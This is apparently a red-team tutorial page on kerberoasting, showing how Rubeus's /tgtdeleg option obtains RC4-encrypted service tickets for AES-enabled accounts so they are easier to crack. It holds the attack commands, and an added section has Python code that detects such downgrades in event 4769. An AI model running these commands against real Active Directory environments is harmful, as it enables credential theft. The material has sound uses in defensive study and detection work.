# Kerberoasting: Requesting RC4 Encrypted TGS when AES is Enabled

It is possible to kerberoast a user account with an SPN even if the account supports Kerberos AES encryption, by requesting an RC4-encrypted TGS (instead of an AES one), which is easier to crack.

## Execution

First off, let's confirm we have at least one user with an SPN set:

{% code title="attacker@victim" %}

```
Get-NetUser -SPN sandy
```

{% endcode %}

![](/files/-LeC_1tcpl1KPWWouoZk)

Since the user account does not support Kerberos AES encryption by default, when requesting a TGS ticket for kerberoasting with Rubeus we will get an RC4-encrypted ticket:

{% code title="attacker@victim" %}

```
F:\Rubeus\Rubeus.exe kerberoast /user:sandy
```

{% endcode %}

![](/files/-LeC_aqPA-VtGrKX8HTD)

If the user is now set to support AES encryption:

![](/files/-LeC_ouxkaUpOSwPfS5l)

By default, returned tickets will be encrypted with the highest possible encryption algorithm, which is AES:

{% code title="attacker@victim" %}

```
F:\Rubeus\Rubeus.exe kerberoast /user:sandy
```

{% endcode %}

![](/files/-LeCdtnIC0SuCcEFl5CA)

## Requesting RC4 Encrypted Ticket

As mentioned in the beginning, it's still possible to request an RC4-encrypted ticket (if RC4 is not disabled in the environment, which does not yet seem to be common):

{% code title="attacker@victim" %}

```
F:\Rubeus\Rubeus.exe kerberoast /tgtdeleg
```

{% endcode %}

Even though AES encryption is supported by both parties, a TGS ticket encrypted with RC4 (encryption type 0x17/23) was returned. Note that SOCs may be monitoring for tickets encrypted with RC4, since Security event 4769 records the ticket encryption type:

![](/files/-LeCevY4uZ_2GNzRqOYZ)
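As an added illustration of what that monitoring looks like (example code written for this page, not part of the original post or of Rubeus): a small Python detector over constructed 4769 events that flags RC4 (0x17) service tickets and ranks higher the ones issued for an account whose msDS-SupportedEncryptionTypes advertises AES, which is exactly the downgrade shown above. Account names, client IPs and attribute values are constructed sample data.

```python
# Added example (not from the original page): detector for RC4 TGS downgrades
# over constructed Windows Security event 4769 records.
# 4769 ("A Kerberos service ticket was requested") logs TicketEncryptionType;
# 0x17 is RC4-HMAC, 0x11/0x12 are AES128/AES256.
from dataclasses import dataclass

RC4_HMAC = 0x17

# msDS-SupportedEncryptionTypes bit flags on the account object
ENC_RC4 = 0x4
ENC_AES128 = 0x8
ENC_AES256 = 0x10


@dataclass
class Alert:
    service: str
    requester: str
    client_ip: str
    reason: str


def supports_aes(supported_enc_types: int) -> bool:
    """True if the account advertises AES128 or AES256 session keys."""
    return bool(supported_enc_types & (ENC_AES128 | ENC_AES256))


def find_rc4_tgs(events, enc_types_by_account):
    """Return an Alert per RC4 service ticket issued for a user account.
    A hit for an AES-capable account is the encryption downgrade signature."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4769 or int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        service = ev["ServiceName"]
        # computer accounts and krbtgt are noise for a kerberoast detection
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        enc = enc_types_by_account.get(service)
        if enc is not None and supports_aes(enc):
            reason = "RC4 TGS for AES-capable service account (downgrade)"
        else:
            reason = "RC4 TGS for user service account"
        alerts.append(Alert(service, ev["TargetUserName"], ev["IpAddress"], reason))
    return alerts


# Constructed sample events (not real log data)
SAMPLE_EVENTS = [
    {"EventID": 4769, "ServiceName": "sandy", "TargetUserName": "attacker@LAB.LOCAL",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.7"},
    {"EventID": 4769, "ServiceName": "sandy", "TargetUserName": "attacker@LAB.LOCAL",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.7"},
    {"EventID": 4769, "ServiceName": "WS01$", "TargetUserName": "bob@LAB.LOCAL",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.8"},
    {"EventID": 4769, "ServiceName": "svc_sql", "TargetUserName": "attacker@LAB.LOCAL",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.7"},
]
# Constructed msDS-SupportedEncryptionTypes: sandy advertises AES, svc_sql only RC4
SAMPLE_ENC_TYPES = {"sandy": ENC_RC4 | ENC_AES128 | ENC_AES256, "svc_sql": ENC_RC4}

if __name__ == "__main__":
    for alert in find_rc4_tgs(SAMPLE_EVENTS, SAMPLE_ENC_TYPES):
        print(alert)
```

The computer-account filter matters in practice: domain members still commonly negotiate RC4 for machine-account tickets, and alerting on those buries the user-SPN hits.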

## References

{% embed url="https://www.harmj0y.net/blog/redteaming/kerberoasting-revisited/" %}
